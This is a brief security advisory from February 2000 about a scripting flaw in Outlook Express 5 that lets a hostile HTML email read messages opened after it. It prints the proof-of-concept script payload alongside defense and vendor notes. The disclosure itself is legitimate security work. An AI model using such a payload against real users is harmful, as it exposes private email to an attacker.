Outlook Express Object Access

 
Outlook Scripting
Reported February 1, 2000 by Georgio Guninski
VERSIONS AFFECTED
  • Microsoft Outlook Express 5

DESCRIPTION

Outlook Express 5.01 and Internet Explorer 5.01 under Windows 95 (and possibly other versions) allow reading subsequently opened email messages after a hostile message is opened.

The problem is that script in the message can assign the document object of the email message to a variable in a newly opened window. Through this variable, the new window can access email messages that are opened afterward.

The code that must be included in the HTML message is:
-------------------------------------------------
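<SCRIPT>
// Open a new window whose about: document contains a link; the link's script reads x.
a=window.open("about:<A HREF='javascript:alert(x.body.innerText)'>Click here to see the active message</A>");
// Give the new window a reference to the email message's document object.
a.x=window.document;
</SCRIPT>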
-------------------------------------------------

DEFENSE

Disable Active Scripting

VENDOR RESPONSE

Microsoft is aware of the issue; however, no response was known at the time of this writing.

CREDITS
Discovered by Georgio Guninski